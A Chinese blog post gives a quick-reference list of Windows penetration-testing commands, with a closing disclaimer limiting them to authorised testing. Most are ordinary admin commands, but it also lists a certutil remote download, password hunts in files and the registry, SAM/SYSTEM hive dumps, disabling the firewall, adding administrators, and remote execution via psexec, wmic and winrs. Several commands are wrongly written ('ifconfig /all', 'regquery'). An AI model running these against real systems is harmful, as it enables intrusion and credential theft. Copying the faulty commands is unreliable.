抱歉,您的浏览器无法访问本站
本页面需要浏览器支持(启用)JavaScript
了解详情 >

Windows环境渗透测试常用的命令总结

网络安全渗透测试

发布于:2025年4月8日

次浏览

字数:1.7k 字

时长:7 分钟

Windows环境渗透测试常用的命令总结

本文整理了Windows环境下进行渗透测试时常用的命令行工具和技巧,可作为渗透测试过程中的快速参考手册。

文件操作与信息收集

远程文件下载

1
2
3
4
5
6
7
8
# 使用certutil从远程URL下载文件
certutil -urlcache -split -f http://baidu.com/test.exe

# 文件查找
findstr /s /i "pass" *.py*

# 搜集注册表中的密码数据
regquery HKLM /f password /t REG_SZ /s

远程连接检查

1
2
3
# 查看有没有开启远程连接
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
# 结果:1表示关闭,0表示开启

补丁检查

1
2
# 快速查找未打补丁的exp
systeminfo > bzhack.txt & (for %i in (KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780) do @type bzhack.txt | @find /i "%i" || @echo %i you can exp) & del /f /q /a bzhack.txt

基础文件系统命令

命令 描述 常见用途
md 建文件夹 创建新目录
rd 删除文件夹 删除目录结构
tree 显示文件夹结构 可视化目录层次
dir 显示磁盘目录内容 列出文件和目录
copy 复制文件 文件复制操作
Xcopy copy加强版 复制文件夹及其内容
del 删除文件 删除指定文件
ren 修改文件名 重命名文件或目录
type 查看文本内容 显示文本文件内容

文件查找

1
2
3
4
5
6
7
8
# 搜索d盘里conf结尾的文件
dir /a /s /b d:\"*.conf"

# 文本编辑
edit

# 显示文件内容
type

系统信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# 查看机器名  
hostname

# 清屏
cls

# 查看开启的服务,比如Terminal Services远程连接服务
net start

# 关闭防火墙
net stop sharedaccess

# 查看当前机器的环境变量
set

# 列出当前机器上的所有盘符
fsutil fsinfo drives

网络信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# 获取域名、IP地址、DHCP服务器、网关、MAC地址、主机名
ifconfig /all

# 查看域名、时间
net time /domain

# 查看域内所有共享
net view /domain

# 查看对方局域网内开启了哪些共享
net view <ip>

# 查看域名、机器名等
net config workstation

用户与权限管理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
# 建立用户
net user <用户名> <密码> /add

# 删除用户
net user <用户名> /del

# 激活guest账户
net user guest /active:yes

# 查看账户
net user

# 查看指定账户信息
net user <账户名>

# 查看域内用户
net user /domain

# 查看账户信息(域)
net user <用户名> /domain

# 查看域中的组
net group /domain

# 查看当前域的管理用户
net group "domainadmins" /domain

# 查看当前在线的用户
query user

# 查看所有的本地组
net localgroup

# 查看administrators组中有哪些用户
net localgroup administrators

# 把用户添加到管理员组中
net localgroup administrators <用户名> /add

服务与共享管理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# 查看开启服务
net start

# 开启某服务
net start <服务名>

# 停止某服务
net stop <服务名>

# 查看本地开启的共享
net share

# 开启ipc$共享
net share ipc$

# 删除ipc$共享
net share ipc$ /del

# 删除C:共享
net share c$ /del

域信息查询

1
2
3
4
5
6
7
8
9
10
11
# 查看所有域控制器
dsquery server

# 查看域内子网
dsquery subnet

# 查看域内工作组
dsquery group

# 查看域内站点
dsquery site

网络连接与端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# 查看开启了哪些端口
netstat -a
# 常用
netstat -an

# 查看端口的网络连接情况
netstat -n
# 常用
netstat -an

# 查看正在进行的工作
netstat -v

# 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -p <协议名>
# 例如
netstat -p tcp/ip

# 查看正在使用的所有协议使用情况
netstat -s

系统管理命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)
# 注意:参数-A要大写
nbtstat -A <ip>

# 导出用户组信息、权限配置
reg save hklm\sam sam.hive

# 导出SYSKEY
reg save hklm\system system.hive

# 连接目标机器
net use \\<目标IP>\ipc$ <密码> /u:<用户名>

# 在某个时间启动某个应用
at \\<目标IP> 21:31 c:\server.exe

# 连接目标机器
wmic /node:"<目标IP>" /password:"123456" /user:"admin"

# 在目标机器上执行cmd
psexec.exe \\<目标IP> -u <username> -p <password> -s cmd

# 查看最近有哪些用户登陆
finger <username> @host

网络与系统分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# 显示IP路由信息
route print

# 查看和处理ARP缓存
arp
# 显示全部ARP信息
arp -a

# IP地址侦测
nslookup

# 查看当前进程
tasklist

# 终止指定PID进程
taskkill /pid <PID数>

# 查看当前用户及权限
whoami

# 查看计算机信息(版本,位数,补丁情况)
systeminfo

# 查看计算机操作系统版本
ver

# 查看当前计算机进程情况
tasklist /svc
netstat -ano

WMIC命令集

WMIC(Windows Management Instrumentation Command-line)是一个功能强大的命令行工具,可用于管理本地或远程计算机。

命令 用途 示例
wmic product 查看安装软件信息 wmic product > ins.txt
wmic bios 查看BIOS信息 wmic bios
wmic qfe 查看补丁信息 wmic qfe get hotfixid
wmic startup 查看启动项 wmic startup list full
wmic service 查看系统服务 wmic service where state="running"
wmic os 查看操作系统信息 wmic os get caption,version
wmic process 查看进程信息 wmic process get caption,executablepath,commandline
wmic logicaldisk 查看硬盘信息 wmic logicaldisk where drivetype=3 get name, freespace
wmic useraccount 查看用户账户信息 wmic useraccount get /ALL
wmic share 查看共享信息 wmic share get /ALL

WinRS远程命令

WinRS(Windows Remote Shell)是一个命令行工具,允许管理员在远程计算机上安全地运行命令。

基本用法

1
2
3
4
5
6
7
winrs -r:https://myserver.com command
winrs -r:myserver.com -usessl command
winrs -r:myserver command
winrs -r:http://127.0.0.1 command
winrs -r:http://169.51.2.101:80 -unencrypted command
winrs -r:https://[::FFFF:129.144.52.38] command
winrs -r:http://[1080:0:0:0:8:800:200C:417A]:80 command

高级用法

1
2
3
4
winrs -r:https://myserver.com -t:600 -u:administrator -p:$%fgh7 ipconfig
winrs -r:myserver -env:PATH=^%PATH^%;c:\tools -env:TEMP=d:\temp config.cmd
winrs -r:myserver netdom join myserver /domain:testdomain /userd:johns /passwordd:$%fgh789
winrs -r:myserver -ad -u:administrator -p:$%fgh7 dir \\anotherserver\share

总结

本文整理了Windows环境下进行渗透测试时常用的命令行工具和技巧,涵盖了系统信息收集、用户权限管理、网络连接分析等多个方面。在实际渗透测试过程中,熟练掌握这些命令可以大大提高工作效率。

注意:本文所列命令仅供安全研究和授权渗透测试使用,未经授权对系统进行渗透测试属于违法行为。

博客内容遵循 署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0) 协议

本文永久链接是:https://intxss.com/windows-pentest-commands/

更新于:2025年4月26日

Windows

命令行

安全工具

渗透测试

评论



2024- 旅途の途中 | Made with by 椿 | Powered by Hexo & Volantis